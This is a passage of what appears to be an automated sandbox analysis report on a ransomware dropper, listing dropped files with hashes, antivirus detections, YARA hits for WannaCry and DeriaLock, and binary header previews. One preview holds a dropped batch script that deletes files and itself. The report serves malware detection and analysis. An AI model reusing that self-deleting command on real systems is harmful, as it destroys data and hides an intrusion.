                                                                                                                                                SSDEEP:3072:slkfrcHVaq65Oe/ALwm19MYDzMLGquSOt+nSmgevSvoWAnvN0bfINcfln8rvK:Wkfrc0q47/UwQFSFnH9SArvakSflnCS
                                                                                                                                                MD5:8803D517AC24B157431D8A462302B400
                                                                                                                                                SHA1:B56AFCAD22E8CDA4D0E2A98808B8E8C5A1059D4E
                                                                                                                                                SHA-256:418395EFD269BC6534E02C92CB2C568631ADA6E54BC55ADE4E4A5986605FF786
                                                                                                                                                SHA-512:38FDFE0BC873E546B05A8680335526EEC61CCC8CF3F37C60EEE0BC83EC54570077F1DC1DA26142488930EABCC21CB7A33C1B545A194CBFB4C87E430C4B2BFB50
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                • Antivirus: Metadefender, Detection: 83%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eU!.!4O.!4O.!4O.!4O. 4O.Rich!4O.................PE..L...{.............................................@.......................... ..........................................................\............................................................................................................text............................... ....rsrc...\........................... ...........IS&.u..n.y...P0..c{. ..J..b.>..o.i...R...3.Ap..3...~.EW_.Y.}+..A.2.h.(N^.....B....e....l.h.}.R....?.....y..(.3....Gp.u..n.....P.j...2.R2.(.7.....5...m).&.G..RvZS....?$. t.z...e|3.-..........pRj...c.....]b.7T*..D..R.s...lS.\.i..0..yL?.....E{......ex..+.\.l..........AS..`_I8.....A..]c.r...h....Z......Z[../.f.}.p...[.6.t...IAx`....K.K@v}.#.x.../R.......@!:A.;E39.J......'1....3.)BE..........TER*b....O........U.rS_<..........E.....@....0v.....|.we.....@].
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2007552
                                                                                                                                                Entropy (8bit):7.761090155030316
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:p/VoMTzwF77l0VqmuTefhLTtk31XyXb9:ptoMTzwVmq3ettk31ob9
                                                                                                                                                MD5:CB02C0438F3F4DDABCE36F8A26B0B961
                                                                                                                                                SHA1:48C4FCB17E93B74030415996C0EC5C57B830EA53
                                                                                                                                                SHA-256:64677F7767D6E791341B2EAC7B43DF90D39D9BDF26D21358578D2D38037E2C32
                                                                                                                                                SHA-512:373F91981832CD9A1FF0B8744B43C7574B72971B5B6B19EA1F4665B6C878F7A1C7834AC08B92E0ECA299EB4B590BF10F48A0485350A77A5F85FC3D2DD6913DB3
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                • Antivirus: Metadefender, Detection: 36%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,7.M.................H...V.......f... ........@.. ....................... ............@..................................f..K.......@P........................................................................... ............... ..H............text....F... ...H.................. ..`.sdata...............L..............@....rsrc...@P.......R...N..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe
                                                                                                                                                File Type:ASCII text, with very long lines (344), with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):344
                                                                                                                                                Entropy (8bit):5.882884377194145
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:6WTX+/Cj1uCrKQw2PRZkvtXU3y/8XiG2YmW7S/vShkRlIAe5qpdqow:xGk/rKQhPC3/HjCISh8Uqzhw
                                                                                                                                                MD5:7E0A369DD0F05763709E5FAED647593A
                                                                                                                                                SHA1:C55DCBBC3803FB788BE1CEC3F5E8DAB0EDFEE220
                                                                                                                                                SHA-256:3B144368DA283F296A5999CB6A5A2D1D3C28030203319ED0C337FF508546FCA6
                                                                                                                                                SHA-512:C95C987B5672C4FE4B1B849DDDD98D10F301017E25F6CE9C725726E23688C789311426F6E4A546B39CEB1A6730FB4F6582A0D55F711D4C248C4A8FD45D15A49F
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:d8K432auQnEWCrhW+zuonizJEju9EKVnpu67Dtj2eqtQknaeKfr6IozXRNX+FCvY8I9VJC1ouI4VM7ijd+19RLg/w7GByao/PVTYRp5pqQ5iYJIm4MRy0DDUWAk8QqUddVofyQcilInIK3N4dcSY6ibRYXuR8LqHeut2th3pTiFSMEpvBmQ7frhZp6QIDswSTkavZwkg7yYyGhxedCntgLzFSKhR57rAfsu4PGeNWshxmXT2BKo1Qwvh4cMIk7SgisbA4wocG7pDOgcf5BY4FGVV3MQC6RZoB94MawJ7dvT3UwffptMfhD64kgN/5DpC4i8W8tYDoNTLNR+5lPQHWg==
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe
                                                                                                                                                File Type:b.out overlay pure segmented executable V2.3 Large Text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):130
                                                                                                                                                Entropy (8bit):6.334029786448733
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Tlp32CVpmfB0Db0z3avJdvaq0bktGVl+7vYCpCfxkBT:mCVycY3ITvaq0bkGPEACp/
                                                                                                                                                MD5:1A68D0453369594B4383984135762DFE
                                                                                                                                                SHA1:98BA1E9B21DDE5F1CD4DA7A57D563D8AB027DD09
                                                                                                                                                SHA-256:28180072609045A90D81F8980786E1D0CFC93639A46B8D35CC28C55C40444776
                                                                                                                                                SHA-512:16D33968C68E5BB21EE3F15C0BAFE34EC07D5A1A27257CB42B7D926EEE27D554760C1F66BCD3F7815F84021321C068D3CA6C7D689A8811F0A3BC5C28915CB6A2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:........RSA1p.........wP..%....H#40...L.&_U......-.HB.u....4Qn.......!WtJ....L.kx1.......~.n.+..?y.=.n....]D^6..h=.DZ.g_.Ti&4....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe
                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1252, Author: brbrb-233452345, Template: Normal.dotm, Last Saved By: brbrb-233452345, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Mar 13 23:34:00 2012, Last Saved Time/Date: Tue Mar 13 23:34:00 2012, Number of Pages: 1, Number of Words: 37, Number of Characters: 211, Security: 0
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):26112
                                                                                                                                                Entropy (8bit):2.5899084749736088
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:yonQ4IuqyZDQozyGRsp6bfu5jKIDa05vZXidq/0GfxFpzd51LAqj+eJBp98Lwb1S:9WDyZEozyGc6ri5bv/0ylca+e/f
                                                                                                                                                MD5:2FC0E096BF2F094CCA883DE93802ABB6
                                                                                                                                                SHA1:A4B51B3B4C645A8C082440A6ABBC641C5D4EC986
                                                                                                                                                SHA-256:14695F6259685D72BF20DB399B419153031FA35277727AB9B2259BF44A8F8AE3
                                                                                                                                                SHA-512:7418892EFE2F3C2FF245C0B84708922A9374324116A525FA16F7C4BCA03B267DB123AD7757ACF8E0BA15D4EA623908D6A14424088A542125C7A6394970DD8978
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:......................>...................................0...............-......................................................................................................................................................................................................................................................................................................................................................................................................................................................[.............................bjbj..........................4...................................................................................................................................................................................................................0...................................................................$.......&.......&.......&.......&.......&.......&...$...........w...f...J.....................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):225280
                                                                                                                                                Entropy (8bit):7.663735783294972
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:EJv/3Ppzq+M4Lh5VWK5qlYRV+hvuFiweXXbGgL90v5mq33Z3:8hzEA5GlYMWFBeXvx0c+3
                                                                                                                                                MD5:3ED3FB296A477156BC51ABA43D825FC0
                                                                                                                                                SHA1:9CAA5C658B1A88FEE149893D3A00B34A8BB8A1A6
                                                                                                                                                SHA-256:1898F2CAE1E3824CB0F7FD5368171A33ABA179E63501E480B4DA9EA05EBF0423
                                                                                                                                                SHA-512:DC3D6E409CEE4D54F48D1A25912243D07E2F800578C8E0E348CE515A047ECF5FA3089B46284E0956BBCED345957A000EECDC082E6F3060971759D70A14C1C97E
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                • Antivirus: Metadefender, Detection: 82%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eU!.!4O.!4O.!4O.!4O. 4O.Rich!4O.................PE..L...{....................\...........(.......p....@..................................................................................p..\............................................................................................................text...I[.......\.................. ....rsrc...\....p.......^.............. .............4)...t....I.....px.:.0.57. Jr~L..3.;..FkJ......F.W.`.;..$g..... u.l......7...)..SO.=...*.).!vZmX4....Er...H0....*..........,./$.....@..}D........b.q...k.w...h.P..E..(R.....m..2)+b.......{.\.0......}".?.....6.HJK}..s..K.=L...I.C....#.W....aY...o......bvr.myH%.5.@.{..>...&.h6.#=.[.......N....kD..(....?.t.'z..s..*.p...._YA...T...dI..Ry....H=?..Y.=..+........[.d$..C?eE.....N.(.'.V(....l....9IJ....5.$B..].O.3..AJ.B.5...{]...` T. >......3.L.\...5s.......
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):112
                                                                                                                                                Entropy (8bit):4.768536250532167
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:jGknQngol9LL3BGc2moKY9LL32JCK0rSgK0/o+0K0+ov:6kqgAbBGdmoKWb/egXo+03
                                                                                                                                                MD5:BAE1095F340720D965898063FEDE1273
                                                                                                                                                SHA1:455D8A81818A7E82B1490C949B32FA7FF98D5210
                                                                                                                                                SHA-256:EE5E0A414167C2ACA961A616274767C4295659517A814D1428248BD53C6E829A
                                                                                                                                                SHA-512:4E73A24161114844D0E42C44C73205C4A57FA4169BD16C95FB7E9D6D5FCDF8BD01741541C77570556AC1F5EE260DA67A9041F40381B6C6E0601C9DE385BDC024
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:echo WScript.Sleep(50)>%TEMP%/file.vbs..cscript %TEMP%/file.vbs..del /F /Q file.js..del /F /Q %1..del /F /Q %0..
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):495616
                                                                                                                                                Entropy (8bit):6.338057450703654
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:lqHKx3YCgy8HmmjJpnVhvLqCO3bLinIz1wASx:lqHoyHNj/nVhvLcyII
                                                                                                                                                MD5:0A7B70EFBA0AA93D4BC0857B87AC2FCB
                                                                                                                                                SHA1:01A6C963B2F5F36FF21A1043587DCF921AE5F5CD
                                                                                                                                                SHA-256:4F5BFF64160044D9A769AB277FF85BA954E2A2E182C6DA4D0672790CF1D48309
                                                                                                                                                SHA-512:2033F9637B8D023242C93F54C140DD561592A3380A15A9FDC8EBFA33385FF4FC569D66C846A01B4AC005F0521B3C219E87F4B1ED2A83557F9D95FA066AD25E14
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe, Author: Joe Security
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                • Antivirus: Metadefender, Detection: 69%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`X............................~.... ... ....@.. ....................... ............`.................................$...W....@.............................. ............................................... ............... ..H............text........ ...................... ..`.sdata..8.... ......................@....rsrc.......@......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2066944
                                                                                                                                                Entropy (8bit):7.407449411158182
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:FH/1Fdq0wneDrEoYxWFjmYMcKabLVp3diY7kp:FH/1Fdq0nIo2YAcl/NisA
                                                                                                                                                MD5:C7E9746B1B039B8BD1106BCA3038C38F
                                                                                                                                                SHA1:CB93AC887876BAFE39C5F9AA64970D5E747FB191
                                                                                                                                                SHA-256:B1369BD254D96F7966047AD4BE06103830136629590182D49E5CB8680529EBD4
                                                                                                                                                SHA-512:CF5D688F1AEC8EC65C1CB91D367DA9A96911640C695D5C2D023836EF11E374FF158C152B4B6207E8FCDB5CCF0EED79741E080F1CBC915FE0AF3DACD624525724
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                                                • Antivirus: Metadefender, Detection: 60%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o...........C.^....C.\.......O....|.....l.=....o.&....s......}.....y....Rich............PE..L....FL..........................................@.................................a. .........................................|....`..............................`..................................@.......................@....................text............................... ..`.rdata..............................@..@.data............<..................@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1227610
                                                                                                                                                Entropy (8bit):7.967961253692764
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:Lutr5OUF7zfbMEsJiZp8uSOBpik+Qijrcq0y0JL4SprofsCghjmxQ:LuXfbMvGei9yjrcq0y0JL4ggghjv
                                                                                                                                                MD5:910DD666C83EFD3496F21F9F211CDC1F
                                                                                                                                                SHA1:77CD736EE1697BEDA0AC65DA24455EC566BA7440
                                                                                                                                                SHA-256:06EFFC4C15D371B5C40A84995A7BAE75324B690AF9FBE2E8980F8C0E0901BF45
                                                                                                                                                SHA-512:467D3B4D45A41B90C8E29C8C3D46DDFBDEE9875606CD1C1B7652C2C7E26D60FEDAC54B24B75DEF125D450D8E811C75974260BA48A79496D2BDAF17D674EDDB47
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}..9..9..9...a..1...a..*..9....'.z.<..0.l.8..0.k....0.}.8..'.{.8..0.~.8..Rich9..........PE..L...f.K..................................... ....@..........................P.......6...............................7..3....)..........`>..........................."............................................... ...............................text...n........................... ..`.rdata..e.... ......................@..@.data........@.......&..............@....CRT.................(..............@..@.rsrc...`>.......@...*..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):195400
                                                                                                                                                Entropy (8bit):7.873003999274124
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:15TDpNFVbxDSXJFFGhcBR1WLZ37p73G8Wn7GlDOg+ELqdSxo5XtIZjnvxRJgghaR:157TcfFPB6B3GL7g+me5aZjn5VlI9T/
                                                                                                                                                MD5:248AADD395FFA7FFB1670392A9398454
                                                                                                                                                SHA1:C53C140BBDEB556FCA33BC7F9B2E44E9061EA3E5
                                                                                                                                                SHA-256:51290129CCCCA38C6E3B4444D0DFB8D848C8F3FC2E5291FC0D219FD642530ADC
                                                                                                                                                SHA-512:582B917864903252731C3D0DFF536D7B1E44541EE866DC20E0341CBEE5450F2F0FF4D82E1EEE75F770E4DAD9D8B9270AB5664FFEDFE21D1AD2BD7FE6BC42CF0E
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                • Antivirus: Metadefender, Detection: 60%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................^...|.......0.......p....@..........................0......7........................................t.......p..h...............h............................................................p...............................text....].......^.................. ..`.rdata.......p.......b..............@..@.data....T...........v..............@....ndata...................................rsrc...h....p.......z..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3514368
                                                                                                                                                Entropy (8bit):7.995470941164686
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB
                                                                                                                                                MD5:84C82835A5D21BBCF75A61706D8AB549
                                                                                                                                                SHA1:5FF465AFAABCBF0150D1A3AB2C2E74F3A4426467
                                                                                                                                                SHA-256:ED01EBFBC9EB5BBEA545AF4D01BF5F1071661840480439C6E5BABE8E080E41AA
                                                                                                                                                SHA-512:90723A50C20BA3643D625595FD6BE8DCF88D70FF7F4B4719A88F055D5B3149A4231018EA30D375171507A147E59F73478C0C27948590794554D031E7D54B7244
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Users\user\AppData\Local\Temp\nuxubd5j.5lo\Endermanch@WannaCrypt0r.exe, Author: Florian Roth (with the help of binar.ly)
                                                                                                                                                • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Users\user\AppData\Local\Temp\nuxubd5j.5lo\Endermanch@WannaCrypt0r.exe, Author: us-cert code analysis team
                                                                                                                                                • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\nuxubd5j.5lo\Endermanch@WannaCrypt0r.exe, Author: ReversingLabs
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                • Antivirus: Metadefender, Detection: 88%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4
                                                                                                                                                Entropy (8bit):2.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:aC:J
                                                                                                                                                MD5:31BABBF9E3B20130AF37DC0999C221D1
                                                                                                                                                SHA1:ED17283F145EBC7C4B16EB5EA60BB0E72D08951C
                                                                                                                                                SHA-256:D036B39C5BE4E1C034D3542EDE9BA4E7DF59E79BC6BE7A0BFD2ABA2200E40B06
                                                                                                                                                SHA-512:8821056A6D55FBE4B38DF4EC1E3601735D28261EB3316731EEEC233F23CD3E7FE18A0AEB23DF9BBE60A85424236640153F17A5DE1DE9CA89CB769B75577DD1A3
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:qCwg
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):86016
                                                                                                                                                Entropy (8bit):7.7036277170460306
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:vpeW2JCTz5eDMn1Wi8N36flDRdHOjN0O02SHU00wCpEbE1PDai41lkgD:xH2JCTz5mmYoDRdHOB0O3d00wiEY134D
                                                                                                                                                MD5:9D15A3B314600B4C08682B0202700EE7
                                                                                                                                                SHA1:208E79CDB96328D5929248BB8A4DD622CF0684D1
                                                                                                                                                SHA-256:3AB3833E31E4083026421C641304369ACFD31B957B78AF81F3C6EF4968EF0E15
                                                                                                                                                SHA-512:9916397B782AAAFA68EB6A781EA9A0DB27F914035DD586142C818CCBD7E69036896767BEDBA97489D5100DE262A554CF14BCDF4A24EDDA2C5D37217B265398D3
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                • Antivirus: Metadefender, Detection: 63%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@..........................................$..{(.k..Q...M.D......S5I......3..:........I-..Ea.........:..l~.?~.?~.?.U.?Y.?...?..?p..?..?#..?..?...?e.?.g.?..?Rich~.?........PE..L..._l.H.....................@......0.............@.............................................................................T........=..........................................................................................................UPX0....................................UPX1................................@....rsrc....@.......@..................@..............................................................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):119296
                                                                                                                                                Entropy (8bit):7.911347099102218
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:pYV/aVHN9ySTn34w33FVTyuGAxsvBLSqAKZqoqrxy031l3y:8adNlltyu3Pa5gr33
                                                                                                                                                MD5:41789C704A0EECFDD0048B4B4193E752
                                                                                                                                                SHA1:FB1E8385691FA3293B7CBFB9B2656CF09F20E722
                                                                                                                                                SHA-256:B2DCFDF9E7B09F2AA5004668370E77982963ACE820E7285B2E264A294441DA23
                                                                                                                                                SHA-512:76391AC85FDC3BE75441FCD6E19BED08B807D3946C7281C647F16A3BE5388F7BE307E6323FAC8502430A4A6D800D52A88709592A49011ECC89DE4F19102435EA
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                                                • Antivirus: Metadefender, Detection: 78%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................................................................................................................................................PE..L...)..G.............................d.......p....@..........................................................................t.......p.......................................................f......................................................UPX0....................................UPX1................................@....rsrc........p......................@......................................................................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4070400
                                                                                                                                                Entropy (8bit):6.189869855231506
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:5gn0YzFj7UZcFz6Cu0Gi+xz+BMZ0XpP7tyXs2QdlXjrZyDcJcikpq3ISEsJNL4wS:5a0eFjvIi+xy/ZYcWdwEsv4p1Xo302C
                                                                                                                                                MD5:F339A8C9E0B32D73C4BAF85EAA120FDF
                                                                                                                                                SHA1:7A587463F564C348A32B1DE4914132B455A650E7
                                                                                                                                                SHA-256:1D9AAA4C55FCA0F434345C8F90DDA5CEBB0E1B37113F16ABEFD5B237A37034B1
                                                                                                                                                SHA-512:FE70715DFAE72F57838F1D7E82BF7614684E13825F8F5FFD961F6A597A2182D6B66682A0432664506D0BF6B4B53E5269C9562411CB7686F8EF16595CA5E4132D
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........hR....................................................................................Rich............................PE..d................." ......0...................................................>......|>...`A.........................................^;..$....;......@=......0<..............`>..0..0Z2.T.............................1...............1..............................text...w.0.......0................. ..`.rdata..4.....0.......0.............@..@.data....o....;..0....;.............@....pdata.......0<.......;.............@..@.rsrc........@=.......<.............@..@.reloc...0...`>..2....=.............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4
                                                                                                                                                Entropy (8bit):2.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:GG:R
                                                                                                                                                MD5:C57E65EE2222A165A16569E35C1ABD9A
                                                                                                                                                SHA1:586BCB3455E3707E939B3FEDBBA1795AF24715CF
                                                                                                                                                SHA-256:F53F13AAA4328C40B116CD2C5FC0ABDF48F290C6C6A31B22F27AA81065DDC27C
                                                                                                                                                SHA-512:38BDC7571FB898D21B2DA6C0BA0CB8F1A9C6DCFF4173BB3853CE8347A38E131578F8F8B7D21DF75897610DA88A6A09DB16E86B1D704E97B56C12061BF77E5EF9
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:swIc
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):757637
                                                                                                                                                Entropy (8bit):7.942040838313248
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:kUWA3AheuswygKEOKlC0DaWL8ldxj1UT1fzosC2kyINJATi1v2yUQpf84i:kUWqistgKErL8P6VzosCfE6TNpf8D
                                                                                                                                                MD5:382430DD7EAE8945921B7FEAB37ED36B
                                                                                                                                                SHA1:C95DDAEBE2AE8FBCB361F3BF080D95A7BB5BF128
                                                                                                                                                SHA-256:70E5E902D0AC7534838B743C899F484FE10766AEFACC6DF697219387A8E3D06B
                                                                                                                                                SHA-512:26ABC02BDE77F0B94613EDC32E0843AC71A0A8F3D8BA01CB94A42C047D0BE7BEFEF52A81984E9A0FA867400082A8905E7A63AAAF85FA32A03D27F7BC6A548C3B
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                • Antivirus: Metadefender, Detection: 28%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}...9.o.9.o.9.o..a..1.o..a..*.o.9.n...o.'...<.o.0..8.o.0....o.0...8.o.'...8.o.0...8.o.Rich9.o.........PE..L.....J.................................... ....@..........................P......7...............................P7..3....(..........`>..........................."............................................... ...............................text...|........................... ..`.rdata....... ......................@..@.data........@.......$..............@....CRT.................&..............@..@.rsrc...`>.......@...(..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):441899
                                                                                                                                                Entropy (8bit):7.891913976230692
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:BHNTywFAvN86pLbqWRKHZKfErrZJyZ0yqsGO3XR63:vT56NbqWRwZaEr3yt2O3XR63
                                                                                                                                                MD5:FBBDC39AF1139AEBBA4DA004475E8839
                                                                                                                                                SHA1:DE5C8D858E6E41DA715DCA1C019DF0BFB92D32C0
                                                                                                                                                SHA-256:630325CAC09AC3FAB908F903E3B00D0DADD5FDAA0875ED8496FCBB97A558D0DA
